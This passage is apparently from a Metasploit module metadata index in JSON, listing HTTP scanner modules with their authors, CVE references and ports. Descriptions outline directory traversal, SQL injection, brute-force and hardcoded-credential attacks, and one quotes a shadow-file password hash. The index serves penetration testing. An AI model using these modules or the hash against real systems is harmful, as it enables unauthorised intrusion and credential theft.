"disclosure_date": null,
"type": "auxiliary",
"author": [
"Dillon Beresford"
],
"description": "This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka\n Network Security Platform. This directory traversal vulnerability is interesting\n because the apache server is running as root, this means we can grab anything we\n want! For instance, the /etc/shadow and /etc/passwd files for the special\n kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user",
"references": [
"CVE-2012-4031",
"EDB-19526"
],
"platform": "",
"arch": "",
"rport": 85,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/wangkongbao_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/wangkongbao_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/web_vulndb": {
"name": "HTTP Vuln Scanner",
"full_name": "auxiliary/scanner/http/web_vulndb",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies common vulnerable files or cgis.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/web_vulndb.rb",
"is_install_path": true,
"ref_name": "scanner/http/web_vulndb",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/webdav_internal_ip": {
"name": "HTTP WebDAV Internal IP Scanner",
"full_name": "auxiliary/scanner/http/webdav_internal_ip",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect webservers' internal IPs through WebDAV",
"references": [
"CVE-2002-0422"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/webdav_internal_ip.rb",
"is_install_path": true,
"ref_name": "scanner/http/webdav_internal_ip",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/webdav_scanner": {
"name": "HTTP WebDAV Scanner",
"full_name": "auxiliary/scanner/http/webdav_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect webservers with WebDAV enabled",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/webdav_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/webdav_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/webdav_website_content": {
"name": "HTTP WebDAV Website Content Scanner",
"full_name": "auxiliary/scanner/http/webdav_website_content",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect webservers disclosing their content through WebDAV",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/webdav_website_content.rb",
"is_install_path": true,
"ref_name": "scanner/http/webdav_website_content",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/webpagetest_traversal": {
"name": "WebPageTest Directory Traversal",
"full_name": "auxiliary/scanner/http/webpagetest_traversal",
"rank": 300,
"disclosure_date": "2012-07-13",
"type": "auxiliary",
"author": [
"dun",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in WebPageTest.\n Due to the way the gettext.php script handles the 'file' parameter, it is possible\n to read a file outside the www directory.",
"references": [
"EDB-19790",
"OSVDB-83817"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/webpagetest_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wildfly_traversal": {
"name": "WildFly Directory Traversal",
"full_name": "auxiliary/scanner/http/wildfly_traversal",
"rank": 300,
"disclosure_date": "2014-10-22",
"type": "auxiliary",
"author": [
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability found in the WildFly 8.1.0.Final\n web server running on port 8080, named JBoss Undertow. The vulnerability only affects\n Windows systems.",
"references": [
"CVE-2014-7816",
"URL-https://access.redhat.com/security/cve/CVE-2014-7816",
"URL-https://www.conviso.com.br/advisories/CONVISO-14-001.txt",
"URL-http://www.openwall.com/lists/oss-security/2014/11/27/4"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wildfly_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/wildfly_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_content_injection": {
"name": "WordPress REST API Content Injection",
"full_name": "auxiliary/scanner/http/wordpress_content_injection",
"rank": 300,
"disclosure_date": "2017-02-01",
"type": "auxiliary",
"author": [
"Marc Montpas",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a content injection vulnerability in WordPress\n versions 4.7 and 4.7.1 via type juggling in the REST API.",
"references": [
"CVE-2017-5612",
"WPVDB-8734",
"URL-https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html",
"URL-https://secure.php.net/manual/en/language.types.type-juggling.php",
"URL-https://developer.wordpress.org/rest-api/using-the-rest-api/discovery/",
"URL-https://developer.wordpress.org/rest-api/reference/posts/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_content_injection.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_content_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_cp_calendar_sqli": {
"name": "WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/wordpress_cp_calendar_sqli",
"rank": 300,
"disclosure_date": "2015-03-03",
"type": "auxiliary",
"author": [
"Joaquin Ramirez Martinez",
"bperry"
],
"description": "This module will scan given instances for an unauthenticated SQL injection\n within the CP Multi-View Calendar plugin v1.1.4 for WordPress.",
"references": [
"CVE-2014-8586",
"EDB-36243",
"WPVDB-7910"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_cp_calendar_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_ghost_scanner": {
"name": "WordPress XMLRPC GHOST Vulnerability Scanner",
"full_name": "auxiliary/scanner/http/wordpress_ghost_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Robert Rowley",
"Christophe De La Fuente",
"Chaim Sanders",
"Felipe Costa",
"Jonathan Claudius",
"Karl Sigler",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module can be used to determine hosts vulnerable to the GHOST vulnerability via\n a call to the WordPress XMLRPC interface. If the target is vulnerable, the system\n will segfault and return a server error. On patched systems, a normal XMLRPC error\n is returned.",
"references": [
"CVE-2015-0235",
"URL-http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html",
"URL-http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_ghost_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_login_enum": {
"name": "WordPress Brute Force and User Enumeration Utility",
"full_name": "auxiliary/scanner/http/wordpress_login_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>",
"Zach Grace <zgrace@404labs.com>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "WordPress Authentication Brute Force and User Enumeration Utility",
"references": [
"BID-35581",
"CVE-2009-2335",
"OSVDB-55713"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-06-14 13:28:03 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_login_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_login_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_multicall_creds": {
"name": "Wordpress XML-RPC system.multicall Credential Collector",
"full_name": "auxiliary/scanner/http/wordpress_multicall_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"KingSabri <King.Sabri@gmail.com>",
"William <WCoppola@Lares.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to find Wordpress credentials by abusing the XMLRPC\n APIs. Wordpress versions prior to 4.4.1 are suitable for this type of\n technique. For newer versions, the script will drop the CHUNKSIZE to 1 automatically.",
"references": [
"URL-https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/",
"URL-https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_multicall_creds",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_pingback_access": {
"name": "Wordpress Pingback Locator",
"full_name": "auxiliary/scanner/http/wordpress_pingback_access",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module will scan for WordPress sites with the Pingback\n API enabled. By interfacing with the API an attacker can cause\n the WordPress site to port scan an external target and return\n results. Refer to the wordpress_pingback_portscanner module.\n This issue was fixed in WordPress 3.5.1.",
"references": [
"CVE-2013-0235",
"URL-http://www.securityfocus.com/archive/1/525045/30/30/threaded",
"URL-http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/",
"URL-https://github.com/FireFart/WordpressPingbackPortScanner"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_pingback_access.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_pingback_access",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_scanner": {
"name": "Wordpress Scanner",
"full_name": "auxiliary/scanner/http/wordpress_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "Detects Wordpress installations and their version number",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_xmlrpc_login": {
"name": "Wordpress XML-RPC Username/Password Login Scanner",
"full_name": "auxiliary/scanner/http/wordpress_xmlrpc_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Cenk Kalpakoglu <cenk.kalpakoglu@gmail.com>"
],
"description": "This module attempts to authenticate against a WordPress site\n (via XMLRPC) using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.",
"references": [
"URL-https://wordpress.org/",
"URL-http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_xmlrpc_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_arbitrary_file_deletion": {
"name": "Wordpress Arbitrary File Deletion",
"full_name": "auxiliary/scanner/http/wp_arbitrary_file_deletion",
"rank": 300,
"disclosure_date": "2018-06-26",
"type": "auxiliary",
"author": [
"Slavco Mihajloski",
"Karim El Ouerghemmi",
"Aloïs Thévenot"
],
"description": "An arbitrary file deletion vulnerability in the WordPress core allows any user with privileges of an\n Author to completely take over the WordPress site and to execute arbitrary code on the server.",
"references": [
"WPVDB-9100",
"EDB-44949",
"PACKETSTORM-148333",
"URL-https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/",
"URL-https://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-03 12:21:38 +0000",
"path": "/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_arbitrary_file_deletion",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_contus_video_gallery_sqli": {
"name": "WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/wp_contus_video_gallery_sqli",
"rank": 300,
"disclosure_date": "2015-02-24",
"type": "auxiliary",
"author": [
"Claudio Viviani",
"bperry"
],
"description": "This module attempts to exploit a UNION-based SQL injection in Contus Video\n Gallery for Wordpress version 2.7 and likely prior in order to determine if the instance is\n vulnerable.",
"references": [
"CVE-2015-2065",
"WPVDB-7793"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_contus_video_gallery_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_dukapress_file_read": {
"name": "WordPress DukaPress Plugin File Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_dukapress_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Kacper Szurek",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n \"DukaPress\" version 2.5.2, allowing arbitrary files to be read with the\n web server's privileges.",
"references": [
"EDB-35346",
"CVE-2014-8799",
"WPVDB-7731",
"OSVDB-115130"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_dukapress_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_gimedia_library_file_read": {
"name": "WordPress GI-Media Library Plugin Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/wp_gimedia_library_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Unknown",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n GI-Media Library version 2.2.2, allowing arbitrary files to be read from the\n system with the web server's privileges. This module has been tested successfully\n on GI-Media Library version 2.2.2 with WordPress 4.1.3 on Ubuntu 12.04 Server.",
"references": [
"WPVDB-7754",
"URL-http://wordpressa.quantika14.com/repository/index.php?id=24"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_gimedia_library_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_mobile_pack_info_disclosure": {
"name": "WordPress Mobile Pack Information Disclosure Vulnerability",
"full_name": "auxiliary/scanner/http/wp_mobile_pack_info_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nitin Venkatesh",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an information disclosure vulnerability in WordPress Plugin\n \"WP Mobile Pack\" version 2.1.2, allowing files with privilege\n information to be read.",
"references": [
"CVE-2014-5337",
"WPVDB-8107",
"PACKETSTORM-132750"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_mobile_pack_info_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_mobileedition_file_read": {
"name": "WordPress Mobile Edition File Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_mobileedition_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Khwanchai Kaewyos",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n \"WP Mobile Edition\" version 2.2.7, allowing arbitrary files to be read with the\n web server's privileges.",
"references": [
"EDB-36733",
"WPVDB-7898"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_mobileedition_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_nextgen_galley_file_read": {
"name": "WordPress NextGEN Gallery Directory Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_nextgen_galley_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Sathish Kumar",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an authenticated directory traversal vulnerability\n in WordPress Plugin \"NextGEN Gallery\" version 2.1.7, allowing\n arbitrary directories to be read with the web server's privileges.",
"references": [
"WPVDB-8165",
"URL-http://permalink.gmane.org/gmane.comp.security.oss.general/17650"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_nextgen_galley_file_read",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_simple_backup_file_read": {
"name": "WordPress Simple Backup File Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_simple_backup_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Mahdi.Hidden",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n \"Simple Backup\" version 2.7.10, allowing arbitrary files to be read with the\n web server's privileges.",
"references": [
"WPVDB-7997",
"PACKETSTORM-131919"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_simple_backup_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_subscribe_comments_file_read": {
"name": "WordPress Subscribe Comments File Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_subscribe_comments_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tom Adams <security@dxw.com>",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an authenticated directory traversal vulnerability\n in WordPress Plugin \"Subscribe to Comments\" version 2.1.2, allowing\n arbitrary files to be read with the web server's privileges.",
"references": [
"WPVDB-8102",
"PACKETSTORM-132694",
"URL-https://security.dxw.com/advisories/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_subscribe_comments_file_read",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/xpath": {
"name": "HTTP Blind XPATH 1.0 Injector",
"full_name": "auxiliary/scanner/http/xpath",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module exploits blind XPATH 1.0 injections over HTTP GET requests.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/xpath.rb",
"is_install_path": true,
"ref_name": "scanner/http/xpath",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/yaws_traversal": {
"name": "Yaws Web Server Directory Traversal",
"full_name": "auxiliary/scanner/http/yaws_traversal",
"rank": 300,
"disclosure_date": "2011-11-25",
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal bug in Yaws v1.9.1 or less.\n The module can only be used to retrieve files. However, code execution might\n be possible, because when the malicious user sends a PUT request, a file is\n actually created, although no content is written.",
"references": [
"CVE-2011-4350",
"OSVDB-77581",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=757181"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/yaws_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/yaws_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/zabbix_login": {
"name": "Zabbix Server Brute Force Utility",
"full_name": "auxiliary/scanner/http/zabbix_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module attempts to log in to a Zabbix server instance using username and password\n combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It\n will also test for the Zabbix default login (Admin:zabbix) and guest access.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/zabbix_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/zabbix_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/zenworks_assetmanagement_fileaccess": {
"name": "Novell ZENworks Asset Management 7.5 Remote File Access",
"full_name": "auxiliary/scanner/http/zenworks_assetmanagement_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a hardcoded user and password for the GetFile maintenance\n task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n Console and can be triggered by sending a specially crafted request to the rtrlet component,\n allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of\n remote files. This module has been successfully tested on Novell ZENworks Asset\n Management 7.5.",
"references": [
"CVE-2012-4933",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/zenworks_assetmanagement_getconfig": {
"name": "Novell ZENworks Asset Management 7.5 Configuration Access",
"full_name": "auxiliary/scanner/http/zenworks_assetmanagement_getconfig",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a hardcoded user and password for the GetConfig maintenance\n task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n Console and can be triggered by sending a specially crafted request to the rtrlet component,\n allowing a remote unauthenticated user to retrieve the configuration parameters of\n Novell ZENworks Asset Management, including the database credentials in clear text.\n This module has been successfully tested on Novell ZENworks Asset Management 7.5.",
"references": [
"CVE-2012-4933",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
"is_install_path": true,
"ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ike/cisco_ike_benigncertain": {
"name": "Cisco IKE Information Disclosure",
"full_name": "auxiliary/scanner/ike/cisco_ike_benigncertain",
"rank": 300,
"disclosure_date": "2016-09-29",
"type": "auxiliary",
"author": [
"Nixawk"
],
